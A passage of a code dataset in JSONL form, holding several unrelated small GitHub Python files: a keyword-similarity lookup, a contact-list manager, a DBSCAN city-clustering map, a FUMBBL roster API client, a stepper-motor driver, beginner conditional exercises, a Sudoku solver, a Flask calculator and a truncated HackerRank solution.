open('./res/three_fourth_tc_word_index.json', 'r') as fp:\r\n word_index = json.load(fp)\r\n tc_index = AnnoyIndex(200)\r\n tc_index.load('./res/three_fourth_tc_index_build.index')\r\n reverse_word_index = dict([(index,word) for (word,index) in word_index.items()])\r\n\r\n keyword = input(\"Keyword(输入end结束):\")\r\n while(True):\r\n if(keyword=='end'):\r\n break\r\n else:\r\n index=word_index.get(keyword+'\\n')\r\n if(index):\r\n result= tc_index.get_nns_by_item(index,5,include_distances=True)\r\n sim_keywords = [(str(reverse_word_index[idx]).strip(), distance) for idx, distance in zip(result[0], result[1]) if\r\n distance < 0.9]\r\n \r\n print(sim_keywords)\r\n else:\r\n print('关键词不在词典中!')\r\n keyword = input(\"Keyword(输入end结束):\")\r\n\r\n\r\n#build()\r\nmain()\r\n","repo_name":"Zzzyyy-KB/keyword","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31515927502","text":"import csv\nfrom os.path import isfile\n\nfrom carbonmail.database.manager import search_contacts, search_list\nfrom carbonmail.database.manager import create_list as db_create_list\nfrom carbonmail.database.manager import create_contact as db_create_contact\nfrom carbonmail.database.manager import delete_list as db_delete_list\n\nfrom carbonmail.utils import string_null_or_empty, valid_email\n\n\ndef initialize(email_sender):\n from carbonmail.list_editor import List_Editor\n\n ls = List_Editor(email_sender)\n ls.enable_window()\n\n\ndef load_lists():\n lists = search_list()\n lists = [_list[1] for _list in lists]\n\n return lists\n\n\ndef create_list(list_name):\n if string_null_or_empty(list_name):\n return False\n\n db_create_list(list_name)\n return True\n\n\ndef update_lists(window, selected_list=None):\n lists = load_lists()\n\n if selected_list:\n selected_index = lists.index(selected_list)\n else:\n selected_index = 0\n\n window[\"-Lists-\"].Update(values=lists, value=lists[selected_index])\n\n\ndef import_contact(csv_path, list_name):\n\n if not isfile(csv_path):\n return -1\n\n with open(csv_path, \"r\", encoding=\"utf-8\") as csv_file:\n dialect = csv.Sniffer().sniff(csv_file.read(1024))\n csv_file.seek(0)\n\n reader = csv.DictReader(csv_file, dialect=dialect)\n\n if not \"name\" in reader.fieldnames or not \"email\" in reader.fieldnames:\n return 0\n\n for row in reader:\n create_contact(row[\"name\"], row[\"email\"], list_name)\n\n\ndef create_contact(name, email, list_name):\n if (\n string_null_or_empty(name)\n or string_null_or_empty(email)\n or not valid_email(email)\n ):\n return False\n\n lists = search_list()\n\n list_id = 0 # Default\n for _list in lists:\n if _list[1] == list_name:\n list_id = _list[0]\n break\n\n db_create_contact(name, email, list_id)\n return True\n\n\ndef delete_list(list_name):\n db_delete_list(list_name)\n\n\ndef get_list_contacts(list_name):\n return search_contacts(list_name)\n","repo_name":"fcrdossantos/carbonmail","sub_path":"carbonmail/list_editor/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4348506533","text":"class create_cluster_map:\n\n def __init__(self,epsilon,min_samples):\n\n self.epsilon = epsilon\n self.min_samples = min_samples\n\n \n def import_data(self):\n data_path = r\"C:\\Users\\jua12849\\Documents\\GitHub\\GeospatialDataAnalysis\\canadacities.csv\"\n canadian_cities = pd.read_csv(data_path)\n datum = \"EPSG:4326\"\n\n #create geodataframe containing data with all canadian cities and a point geometry column\n geometry = [Point(xy) for xy in zip(canadian_cities[\"lng\"],canadian_cities[\"lat\"])]\n gdf = gpd.GeoDataFrame(canadian_cities,crs=datum,geometry=geometry)\n\n return gdf\n\n\n def create_gdf_dictionary(self,gdf):\n #create dictionary with complete data for each province\n d = {}\n for city in gdf.province_id.unique():\n d[\"city_{}\".format(city)] = gdf.loc[gdf[\"province_id\"]==city]\n\n return d\n\n def obtain_provinces(self,d):\n provinces = list(d.keys())\n \n return provinces\n\n\n def create_numpy_dictionary(self,d,gdf,provinces):\n #obtain province names as well as list of dictionary keys.\n\n #obtain lat/long data for each province and the entire country as a numpy array.\n d_lat_lon_numpy = {}\n for province in provinces:\n d_lat_lon_numpy[\"{}\".format(province)] = [d.get(province)[[\"lat\",\"lng\"]].to_numpy()]\n\n d_lat_lon_numpy[\"Canada\"] = [gdf[[\"lat\",\"lng\"]].to_numpy()]\n\n return d_lat_lon_numpy\n\n \n def get_centermost_point(self,cluster):\n centroid = (MultiPoint(cluster).centroid.x, MultiPoint(cluster).centroid.y)\n centermost_point = min(cluster, key=lambda point: great_circle(point, centroid).m)\n return tuple(centermost_point)\n\n def perform_dbscan(self,d_lat_lon_numpy,epsilon=0.019,min_samples=1):\n #kms_per_radian = 6371.0088\n #epsilon = 50 / kms_per_radian\n #epsilon = 0.019\n #min_samples=1\n\n #perform DBSCAN algorithm to each province separately as well as the entire country\n for province in list(d_lat_lon_numpy.keys()):\n #Create DBSCAN object and apply to each latitude/longitude pair\n d_lat_lon_numpy[\"{}\".format(province)].append(\n {\"dbs_{}\".format(province):DBSCAN(eps=epsilon, min_samples=min_samples,algorithm = 'ball_tree',metric='haversine').fit(np.radians(d_lat_lon_numpy.get(province)[0]))})\n #Retrieve labels obtained from algorithm\n d_lat_lon_numpy[\"{}\".format(province)].append(\n {\"{}_cluster_label\".format(province):d_lat_lon_numpy.get(province)[1][\"dbs_{}\".format(province)].labels_})\n #Obtain cluster labels\n d_lat_lon_numpy[\"{}\".format(province)].append(\n {\"{}_num_clusters\".format(province):len(set(d_lat_lon_numpy.get(province)[2][\"{}_cluster_label\".format(province)]))})\n #\n d_lat_lon_numpy[\"{}\".format(province)].append(\n {\"{}_clusters\".format(province):\n pd.Series(d_lat_lon_numpy.get(province)[0][d_lat_lon_numpy.get(province)[2][\"{}_cluster_label\".format(province)] == n] for n in range(d_lat_lon_numpy[\"{}\".format(province)][3][\"{}_num_clusters\".format(province)]))})\n\n d_lat_lon_numpy[\"{}\".format(province)].append(\n {\"{}_centermost_points\".format(province):d_lat_lon_numpy.get(province)[4][\"{}_clusters\".format(province)].map(self.get_centermost_point)})\n\n #unzip the list of centermost points (lat,lon) tuples into separate lat/lon lists\n lats, lons = zip(*d_lat_lon_numpy.get(province)[5][\"{}_centermost_points\".format(province)])\n #create a pandas dataframe\n rep_points = pd.DataFrame({'lon':lons, 'lat':lats})\n\n d_lat_lon_numpy[\"{}\".format(province)].append({\"{}_centermost_points_numpy\".format(province) : rep_points.to_numpy()})\n\n d_lat_lon_numpy[\"{}\".format(province)].append(\n {\"{}_gdf_cluster_samples\".format(province):gpd.GeoDataFrame(rep_points, geometry=gpd.points_from_xy(rep_points.lon, rep_points.lat),crs = \"EPSG:4326\" )})\n\n return d_lat_lon_numpy\n\n def calculate_mean_ontario_loc(self,d): \n #mean location for ontario cities\n mean_lat_on = np.mean(d[\"city_ON\"][\"lat\"])\n mean_lng_on = np.mean(d[\"city_ON\"][\"lng\"])\n \n return mean_lat_on,mean_lng_on\n\n def calculate_mean_canada_loc(self,gdf):\n #mean location for canada cities\n gdf_mean_lat = np.mean(gdf.lat)\n gdf_mean_lng = np.mean(gdf.lng)\n\n return gdf_mean_lat,gdf_mean_lng\n\n def cities_dict(self,d_lat_lon_numpy,provinces):\n cities = {}\n for province in provinces:\n cities[\"{}\".format(province)] = d_lat_lon_numpy.get(\"{}\".format(province))[0]\n \n return cities\n\n def clusters_dict(self,d_lat_lon_numpy,provinces):\n clusters={}\n for province in provinces:\n clusters[\"{}\".format(province)] = d_lat_lon_numpy.get(\"{}\".format(province))[6].get(\"{}_centermost_points_numpy\".format(province))\n \n return clusters\n\n def study_area_numpy(self,cities):\n study_area = np.concatenate([cities[\"city_ON\"],\n cities[\"city_QC\"],\n cities[\"city_NB\"],\n cities[\"city_NS\"]])\n\n return study_area\n\n def cluster_area_numpy(self,clusters):\n study_clusters = np.concatenate([clusters[\"city_ON\"],\n clusters[\"city_QC\"],\n clusters[\"city_NB\"],\n clusters[\"city_NS\"]])\n \n return study_clusters\n\n\n def create_map(self,gdf_mean_lat,gdf_mean_lng,study_area,study_clusters,zoom):\n\n my_map = folium.Map(location=[gdf_mean_lat,gdf_mean_lng], zoom_start=zoom)\n\n for point in study_clusters :\n loc = [point[1],point[0]]\n folium.Marker(location=loc,icon=folium.Icon(color=\"red\")).add_to(my_map)\n #folium.Circle(radius=40000,location=[point[1],point[0]],color=\"red\").add_to(my_map)\n\n for point in study_area :\n loc = [point[0],point[1]]\n #folium.Marker(location=loc,icon=folium.Icon(color=\"blue\")).add_to(my_map)\n folium.Circle(radius=4000,location=loc,color=\"BLUE\").add_to(my_map)\n \n #folium.GeoJson(data = gdf).add_to(my_map) \n\n return my_map \n\n \n def run_map(self):\n\n \n gdf = self.import_data()\n d = self.create_gdf_dictionary(gdf)\n provinces = self.obtain_provinces(d)\n d_lat_lon_numpy = self.create_numpy_dictionary(d,gdf,provinces)\n d_lat_lon_numpy = self.perform_dbscan(d_lat_lon_numpy,epsilon = self.epsilon,min_samples=self.min_samples)\n mean_lat_on,mean_lng_on = self.calculate_mean_ontario_loc(d)\n gdf_mean_lat, gdf_mean_lng = self.calculate_mean_canada_loc(gdf)\n clusters = self.clusters_dict(d_lat_lon_numpy,provinces)\n cities = self.cities_dict(d_lat_lon_numpy,provinces)\n study_area = self.study_area_numpy(cities)\n study_clusters = self.cluster_area_numpy(clusters)\n map = self.create_map(gdf_mean_lat,gdf_mean_lng,study_area,study_clusters,zoom=5)\n\n return map","repo_name":"JuanCReyes1/GeospatialDataAnalysis","sub_path":"testclass.py","file_name":"testclass.py","file_ext":"py","file_size_in_byte":7297,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"31824494710","text":"import copy\r\nimport json\r\nfrom types import MappingProxyType\r\nimport warnings\r\n\r\nfrom pyfumbbl._session import with_default_session\r\nfrom pyfumbbl import exc\r\nfrom pyfumbbl import position\r\n\r\n__all__ = [\r\n 'add',\r\n 'add_star',\r\n 'append_to_ruleset',\r\n 'clone_to_ruleset',\r\n 'create',\r\n 'get',\r\n 'remove',\r\n 'remove_star',\r\n 'search',\r\n 'set_data',\r\n ]\r\n\r\n_NO_DATA = {'positions': [], 'stars': []}\r\n\r\nclass NoRosterDataError(exc.NoDataError):\r\n pass\r\n\r\n\r\nDEFAULT_LOGOS = MappingProxyType(dict((\r\n ('32', '486370'),\r\n ('48', '486369'),\r\n ('64', '486371'),\r\n ('96', '486372'),\r\n ('128', '486373'),\r\n ('192', '486374'),\r\n)))\r\n\r\n\r\nDETAILED_POSITIONS = 0b1\r\nDETAILED_STARS = 0b10\r\n\r\n\r\ndef _rejuvenate(roster_data, _rejuvenate_positions=True,\r\n del_stars=False):\r\n if 'id' in roster_data:\r\n del roster_data['id']\r\n if 'positions' in roster_data and _rejuvenate_positions:\r\n for position_data in roster_data['positions']:\r\n position._rejuvenate(position_data)\r\n if 'stars' in roster_data and del_stars:\r\n for star_data in roster_data['stars']:\r\n if 'id' in star_data:\r\n del star_data['id']\r\n return roster_data\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef add(ruleset_id, roster_id, session=None):\r\n ruleset_id = str(ruleset_id)\r\n assert ruleset_id.isdecimal()\r\n roster_id = str(roster_id)\r\n assert roster_id.isdecimal()\r\n url = session.baseurl / 'api/roster/add'\r\n data = {'ruleset': ruleset_id, 'roster': roster_id}\r\n r = session.post(url, data=data)\r\n return r.json()\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef add_star(roster_id, position_id, session=None):\r\n roster_id = str(roster_id)\r\n assert roster_id.isdecimal()\r\n position_id = str(position_id)\r\n assert position_id.isdecimal()\r\n url = session.baseurl / f'api/roster/addStar/{roster_id}'\r\n data = {'star': position_id}\r\n r = session.post(url, data=data)\r\n return r.json()\r\n\r\n\r\n@with_default_session\r\ndef append_to_ruleset(roster_data, target_ruleset_id,\r\n session=None):\r\n name = roster_data['name']\r\n _rejuvenate(roster_data)\r\n roster_id = create(target_ruleset_id, name, session=session)\r\n set_data(roster_data, roster_id, match_positions_by='none',\r\n session=session)\r\n return roster_id\r\n\r\n\r\n@with_default_session\r\ndef clone_to_ruleset(roster_id, target_ruleset_id,\r\n session=None):\r\n roster_data = get_data(roster_id, flags=DETAILED_POSITIONS,\r\n session=session)\r\n return append_to_ruleset(roster_data, target_ruleset_id,\r\n session=session)\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef create(ruleset_id, name, session=None):\r\n \"\"\"Creates a new roster and returns it's ID\"\"\"\r\n ruleset_id = str(ruleset_id)\r\n assert ruleset_id.isdecimal()\r\n data = {'ruleset': ruleset_id, 'name': name}\r\n url = session.baseurl / 'api/roster/create'\r\n r = session.post(url, data=data)\r\n return r.json()\r\n\r\n\r\n@with_default_session\r\ndef get_data(roster_id, flags=0, session=None):\r\n \"\"\"Returns a roster's data.\r\n\r\n Possible flags are:\r\n DETAILED_POSITIONS - provides a more detailed data for\r\n positions\r\n \"\"\"\r\n roster_id = str(roster_id)\r\n assert roster_id.isdecimal()\r\n url = session.baseurl / f'api/roster/get/{roster_id}'\r\n r = session.get(url)\r\n roster_data = exc.api_error_checked(r.json())\r\n if roster_data == _NO_DATA:\r\n errfs = 'No roster exists with ID = {}.'\r\n raise NoRosterDataError(errfs.format(roster_id))\r\n if flags & DETAILED_POSITIONS:\r\n for position_data in roster_data.get('positions', []):\r\n if 'id' in position_data:\r\n position_id = position_data['id']\r\n detailed_position_data = position.get_data(position_id,\r\n session=session)\r\n position_data.update(detailed_position_data)\r\n if flags & DETAILED_STARS:\r\n for position_data in roster_data.get('stars', []):\r\n if 'id' in position_data:\r\n position_id = position_data['id']\r\n detailed_position_data = position.get_data(position_id,\r\n session=session)\r\n position_data.update(detailed_position_data)\r\n return roster_data\r\n\r\n\r\nget = get_data\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef remove(ruleset_id, roster_id, session=None):\r\n ruleset_id = str(ruleset_id)\r\n assert ruleset_id.isdecimal()\r\n roster_id = str(roster_id)\r\n assert roster_id.isdecimal()\r\n url = session.baseurl / 'api/roster/remove'\r\n data = {'ruleset': ruleset_id, 'roster': roster_id}\r\n r = session.post(url, data=data)\r\n return r.json()\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef remove_star(roster_id, position_id, session=None):\r\n roster_id = str(roster_id)\r\n assert roster_id.isdecimal()\r\n position_id = str(position_id)\r\n assert position_id.isdecimal()\r\n url = session.baseurl / f'api/roster/removeStar/{roster_id}'\r\n data = {'star': position_id}\r\n r = session.post(url, data=data)\r\n return r.json()\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef search(name=\"___\", owner=None, *, session=None):\r\n \"\"\"Searches for rosters name and/or owner\"\"\"\r\n # https://fumbbl.com/index.php?name=PNphpBB2&file=viewtopic&p=681044&highlight=#681044\r\n s = str(name)\r\n if owner is not None:\r\n s = f'{owner}/{s}'\r\n data = {'search': s}\r\n url = session.baseurl / 'api/roster/search'\r\n r = session.post(url, data=data)\r\n return r.json()\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef search_by_owner(name, session=None):\r\n \"\"\"Searches for rosters by a name string\"\"\"\r\n data = {'search': str(name)}\r\n url = session.baseurl / 'api/roster/search'\r\n r = session.post(url, data=data)\r\n return r.json()\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef _set_data(roster_id, keyvals, session=None):\r\n \"\"\"Sets the preferences of a roster.\"\"\"\r\n if isinstance(keyvals, dict):\r\n keyvals = [{'key': k, 'val': v} for k, v in keyvals.items()]\r\n roster_id = str(roster_id)\r\n assert roster_id.isdecimal()\r\n url = session.baseurl / f'api/roster/set/{roster_id}'\r\n data = {\"data\": json.dumps(keyvals)}\r\n r = session.post(url, data=data)\r\n return r.json()\r\n\r\n\r\n@with_default_session\r\ndef set_data(roster_data, roster_id=None,\r\n match_positions_by='id',\r\n session=None):\r\n \"\"\"Sets the preferences of a roster.\"\"\"\r\n assert match_positions_by in ('none', 'id', 'title')\r\n working_keys = {\r\n 'apothecary',\r\n 'finesse',\r\n 'info',\r\n 'name',\r\n 'necromancer',\r\n 'physique',\r\n 'playable',\r\n 'raisePosition',\r\n 'rerollCost',\r\n 'undead',\r\n 'versatility',\r\n }\r\n _roster_data = copy.deepcopy(roster_data)\r\n\r\n if roster_id is None:\r\n if 'id' in roster_data:\r\n roster_id = roster_data['id']\r\n del _roster_data['id']\r\n else:\r\n raise AttributeError('roster id is not defined')\r\n elif 'id' in roster_data:\r\n del _roster_data['id']\r\n\r\n if {'positions', 'stars'} & set(_roster_data):\r\n old_data = get_data(roster_id, session=session)\r\n\r\n if 'positions' in _roster_data:\r\n if match_positions_by != 'none':\r\n old_positions = {p[match_positions_by]: p\r\n for p in old_data['positions']\r\n if match_positions_by in p}\r\n new_positions = {p[match_positions_by]: p\r\n for p in _roster_data['positions']\r\n if match_positions_by in p}\r\n for k in set(old_positions) - set(new_positions):\r\n position.remove(roster_id, old_positions[k]['id'],\r\n session=session)\r\n for position_data in _roster_data['positions']:\r\n position_id = position_data.get('id')\r\n if match_positions_by != 'none':\r\n old_position_data = old_positions.get(position_data.get(\r\n match_positions_by))\r\n if old_position_data:\r\n position_id = old_position_data['id']\r\n if position_id is None:\r\n position_id = position.create(roster_id,\r\n position_data['name'], session=session)\r\n position_data['id'] = position_id\r\n position.set_data(position_data, session=session)\r\n del _roster_data['positions']\r\n\r\n if 'stars' in _roster_data:\r\n old_stars = set(s['id'] for s in old_data.get('stars', [])\r\n if s.get('id'))\r\n new_stars = set(s['id'] for s in _roster_data['stars']\r\n if s.get('id'))\r\n for position_id in old_stars - new_stars:\r\n remove_star(roster_id, position_id, session=session)\r\n for position_id in new_stars - old_stars:\r\n add_star(roster_id, position_id, session=session)\r\n del _roster_data['stars']\r\n\r\n if 'stats' in _roster_data:\r\n for k, v in _roster_data['stats'].items():\r\n _roster_data[k] = v\r\n del _roster_data['stats']\r\n\r\n for k in _roster_data.keys():\r\n if k not in working_keys:\r\n wfs = 'not in working keys: {}'\r\n warnings.warn(wfs.format(k), FutureWarning)\r\n return _set_data(roster_id, _roster_data, session=session)\r\n","repo_name":"FUMBBLPlus/pyfumbbl","sub_path":"pyfumbbl/roster.py","file_name":"roster.py","file_ext":"py","file_size_in_byte":8885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4535394112","text":"# This python script runs a bipolar stepper motor in a full-step sequence for a set number of steps at a specific speed in revolutions per minute.\n# Written by Briana Bouchard \n\nimport RPi.GPIO as GPIO\nimport time\nimport board\nimport digitalio\n\n\n# Initialize pins using BCM mode (GPIO pin numbers not board numbers)\nyellow = digitalio.DigitalInOut(board.D18)\nyellow.direction = digitalio.Direction.OUTPUT\nred = digitalio.DigitalInOut(board.D17)\nred.direction = digitalio.Direction.OUTPUT\ngray = digitalio.DigitalInOut(board.D27)\ngray.direction = digitalio.Direction.OUTPUT\ngreen = digitalio.DigitalInOut(board.D22)\ngreen.direction = digitalio.Direction.OUTPUT\n\n# Define direction values\ncw = 1\nccw = 0\n\n# Define the steps per revolution for the motor \nsteps_rev = 200\n\ndef setMotor(current_step, delay):\n# This function provides the step sequence\n\n if current_step == 0:\n yellow.value = True\n red.value = False\n gray.value = True\n green.value = False\n time.sleep(delay)\n\n elif current_step == 1:\n yellow.value = False\n red.value = True\n gray.value = True\n green.value = False\n time.sleep(delay)\n\n elif current_step == 2:\n yellow.value = False\n red.value = True\n gray.value = False\n green.value = True\n time.sleep(delay)\n \n elif current_step == 3:\n yellow.value = True\n red.value = False\n gray.value = False\n green.value = True\n time.sleep(delay)\n\n\ndef moveSteps(input_steps, speed): \n# This function tracks the number of steps remaining based on the step input and the loop cycles\n\n current_step = 0\n delay = 60/(steps_rev*speed)\n \n # Determines the direction based on sign of input_steps \n if input_steps > 0:\n direction = ccw\n if input_steps < 0:\n direction = cw\n \n for steps_remaining in range (abs(input_steps), 0, -1):\n if direction == cw: \n if current_step >= 0 and current_step < 3:\n current_step = current_step + 1\n elif current_step == 3:\n current_step = 0\n if direction == ccw: \n if current_step <= 3 and current_step > 0:\n current_step = current_step - 1\n elif current_step == 0:\n current_step = 3\n \n setMotor(current_step, delay)\n \n print(\"Stepping complete! Your motor completed \" + str(abs(input_steps)) + \" steps at \" + str(speed)+ \" revolutions per minute\")\n \n\nwhile True:\n # Define the steps per revolution for the motor \n steps_rev = 200\n \n # Set the number of steps to move and the speed in revolutions per minute\n moveSteps(-200, 20)\n \n break\n","repo_name":"kellymacdonald/ME35","sub_path":"pid_test.py","file_name":"pid_test.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72138163254","text":"'''\nif condition:\n do this\nelse:\n do this\n\nLos comparadores son iguales que en java\n'''\n\nprint(\"Welcome to the rollercoaste!\")\nheight = int(input(\"What is your height in cm: \"))\nif height > 130:\n print(\"You can ride the rollercoaster!\")\nelse: \n print(\"Sorry, you have to grow taller before you can ride\")\n\n\n# Ver si un número es par o impar\nnumber = int(input(\"Which number do you want to check? \"))\n\nif number%2 == 0:\n print(\"This is an even number.\")\nelse:\n print(\"This is an odd number.\")\n\n# Condiciones anidadas y elif\n\nprint(\"Welcome to the rollercoaste!\")\nheight = int(input(\"What is your height in cm: \"))\nif height > 130:\n print(\"You can ride the rollercoaster!\")\n age = int(input(\"What is your age? \"))\n if age <= 18:\n print(\"Please, pay $7\")\n elif age > 18 and age < 25:\n print(\"Please, pay $70\")\n else:\n print(\"Please, pay $12\")\nelse: \n print(\"Sorry, you have to grow taller before you can ride\")\n\n\n# BMI 2.0\n\nheight = float(input(\"enter your height in m: \"))\nweight = float(input(\"enter your weight in kg: \"))\nw = float(weight)\nh = float(height)\nBMI = round(w/h**2)\n\nif BMI < 18.5:\n print(f\"Your BMI is {BMI}, you are underweight.\")\nelif BMI > 18.5 and BMI < 25:\n print(f\"Your BMI is {BMI}, you have a normal weight.\")\nelif BMI > 25 and BMI < 30:\n print(f\"Your BMI is {BMI}, you are slightly overweight\")\nelif BMI > 30 and BMI < 35:\n print(f\"Your BMI is {BMI}, you are obese.\")\nelse:\n print(f\"Your BMI is {BMI}, you are clinically obese.\")\n\n\n# Calcular si un año es bisiesto\n\nyear = int(input(\"Which year do you want to check? \"))\n\nif year%4 == 0:\n if year%100 == 0: \n if year%400 == 0:\n print(\"Leap year\")\n else:\n print(\"Not leap year\")\n else:\n print(\"Leap year\")\nelse:\n print(\"Not leap year\")\n\n\n# Pizza order\n\nprint(\"Welcome to Python Pizza Deliveries!\")\nsize = input(\"What size pizza do you want? S, M, or L \")\nadd_pepperoni = input(\"Do you want pepperoni? Y or N \")\nextra_cheese = input(\"Do you want extra cheese? Y or N \")\nbill = 0\n# Tamaño pizza\nif size == 'S':\n bill += 15\n if add_pepperoni == 'Y':\n bill += 2 \nelif size == 'M':\n bill += 20\n if add_pepperoni == 'Y':\n bill += 3 \nelse:\n bill += 25\n if add_pepperoni == 'Y':\n bill += 3 \n\nif extra_cheese == 'Y':\n bill += 1\n\nprint(f\"Your final bill is: ${bill}\")","repo_name":"cynthiatcelorio/100_days_of_code-Pyhton","sub_path":"days_1-10/day3 (Conditional, Logical operatos, code blocks and scope)/Control_flow.py","file_name":"Control_flow.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9773518213","text":"from copy import deepcopy\nfrom sys import exit\n\nclass Board:\n def __init__(self, board):\n # squares is a list of all 81 squares on the board in row order\n self.squares = []\n for i in range(0,81):\n row = i//9\n col = i%9\n if board[row][col] != \".\" and board[row][col] != \"0\":\n self.squares.append([int(board[row][col])])\n else:\n self.squares.append([1,2,3,4,5,6,7,8,9])\n\n #groups holds all the rows, columns and 3x3 squares\n self.groups = []\n coldata = []\n bigsquaredata = []\n for i in range(0,9):\n coldata.append([])\n bigsquaredata.append([])\n for row in range(0,9):\n rowdata = []\n for col in range(0,9):\n # append a *reference* to the relevant square to the row\n square = self.squares[row*9 + col]\n rowdata.append(square)\n coldata[col].append(square)\n bigrow = row//3\n bigcol = col//3\n bigsquaredata[bigrow*3 + bigcol].append(square)\n self.groups.append(rowdata)\n for i in range(0,9):\n self.groups.append(coldata[i])\n for i in range(0,9):\n self.groups.append(bigsquaredata[i])\n\n # eliminate values that have already been solved\n def eliminate(self):\n removed = False\n for g in self.groups:\n # go through the group, building a list of already solved values\n already_solved = []\n for square in g:\n if len(square) == 1:\n already_solved.append(square[0])\n\n # if an already solved value is in another square in this\n # group, remove it\n for square in g:\n if len(square) > 1:\n for d in already_solved:\n if d in square:\n square.remove(d)\n removed = True\n return removed\n\n # if there's only one copy of a value in a group, finalize it.\n def only_one(self):\n removed = False\n for g in self.groups:\n counts = [100]\n for i in range(0,9):\n counts.append(0)\n for square in g:\n if len(square) == 1:\n counts[square[0]] += 10 # don't bother with this one, it's done\n else:\n for num in square:\n counts[num] += 1\n \n for i in range(1,10):\n if counts[i] == 1:\n for square in g:\n if i in square:\n # this is the square that has the only value i,\n # so remove everything else from this square\n for num in square.copy():\n if num != i:\n # can't reassign square - need to\n # modify the original list\n square.remove(num)\n removed = True\n return removed\n\n def check_doubles(self):\n for g in self.groups:\n counts = []\n for i in range(0,9):\n counts.append(0)\n for square in g:\n if len(square) == 1:\n counts[square[0] - 1] += 1\n for i in range(0,9):\n if counts[i] > 1:\n #print(\"count of \", counts[i], \"in group\", g)\n return False\n return True\n\n def eval_move(self):\n progress = True\n while progress:\n progress = self.eliminate()\n progress = progress or self.only_one()\n return self.check_doubles()\n\n def finished(self):\n for square in self.squares:\n if len(square) != 1:\n return False\n return True\n \n def search(self):\n i = 0\n for square in self.squares:\n if len(square) > 1:\n for value in square:\n # clone the game so we can test a hypothesis and\n # roll back if we're wrong\n clone = deepcopy(self)\n\n # test the hypothesis that the i'th square should be 'value'\n clone.squares[i][:] = [value]\n\n # test the consequences of the move\n result = clone.eval_move()\n if result == False:\n #test revealed a wrong move, so try the next option\n continue\n\n # have we finished the board?\n if clone.finished():\n print(\"Finished!\")\n print(clone)\n return True\n\n # OK, not finished, but no immediate\n # contradiction. Continue searching from this\n # position\n if clone.search():\n # we finished!\n return True\n\n # If we get here, none of these moves worked, so the\n # problem was with an earlier move. We'll try again\n # from a earlier move.\n return False\n i += 1\n return False\n \n def __str__(self):\n s = \"\"\n for row in range(0,9):\n if row == 3 or row == 6:\n s += \"---+---+---\\n\"\n for col in range(0,9):\n if col == 3 or col == 6:\n s += \"|\"\n if len(self.groups[row][col]) == 1:\n s += str(self.groups[row][col][0])\n else:\n s += \".\"\n s += \"\\n\"\n return s\n\n\ninitboard = [\n \"...251..3\",\n \".51......\",\n \".2..3....\",\n \"6..7....8\",\n \"5.....7.2\",\n \"1....4..9\",\n \"....8..9.\",\n \"......82.\",\n \"4..312...\"]\n\ninitboard2 = [\n \"8...4127.\",\n \"......9..\",\n \"4..7.6...\",\n \"1.24.....\",\n \".6.....8.\",\n \".....75.1\",\n \"...6.9..3\",\n \"..1......\",\n \".4628...5\"]\n\ninitboard3 = [\n \".9....1..\",\n \"873.4..9.\",\n \"..68.....\",\n \"54.7..8..\",\n \".........\",\n \"..7..4.31\",\n \".....89..\",\n \".6..7.512\",\n \"..1....7.\"]\n\n\ndef loadtests(filename):\n with open(filename, \"rt\") as f:\n for line in f:\n print(line)\n if len(line) >= 81:\n board = []\n for i in range(0,9):\n board.append(line[i*9:(i+1)*9])\n game = Board(board)\n print(game)\n game.search()\n\nrun_tests = True\nif run_tests:\n #loadtests(r\"top95\")\n loadtests(r\"msk_009\")\nelse:\n game = Board(initboard)\n print(game)\n game.search()\n\n","repo_name":"michaelkhot/ENGF0002-2019","sub_path":"Topics/09_Search_etc/sudoku/sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":6889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"74951441011","text":"from flask import Flask, render_template, request\r\n\r\napp = Flask(__name__, template_folder=\"\")\r\n\r\n@app.route(\"/\", methods=[\"GET\",\"POST\"]) \r\ndef home():\r\n if (request.method == \"GET\"):\r\n return render_template(\"index.html\")\r\n else:\r\n if (request.form[\"num1\"] != \"\" and request.form[\"num2\"] != \"\"):\r\n num1 = request.form [\"num1\"]\r\n num2 = request.form [\"num2\"]\r\n\r\n if (request.form == \"mult\"):\r\n mult = int(num1) * int(num2)\r\n return str(mult) \r\n\r\n else:\r\n divi = int(num1) // int(num2)\r\n return str(divi) \r\n else:\r\n return \"Informe um valor válido!\" \r\n\r\n\r\napp.run(port=8080, debug=True) \r\n","repo_name":"AlineR1beiro/Python","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25801191803","text":"def marcs_cakewalk(calorie):\n \"\"\"Hackerrank Problem: https://www.hackerrank.com/challenges/marcs-cakewalk/problem\n\n Marc loves cupcakes, but he also likes to stay fit. Each cupcake has a calorie count, and Marc can walk a distance\n to expend those calories. If Marc has eaten j cupcakes so far, after eating a cupcake with c calories he must walk\n at least 2**j x c miles to maintain his weight.\n\n Solve:\n To calculate the minimum miles, you solve based on the highest calorie to lowest calorie cupcake\n\n Args:\n calorie (list): List of integers denoting the calories for each cupcake\n\n Returns:\n int: The minimum number of miels Marc must walk to maintain his weight\n \"\"\"\n calories = 0\n for i, c in 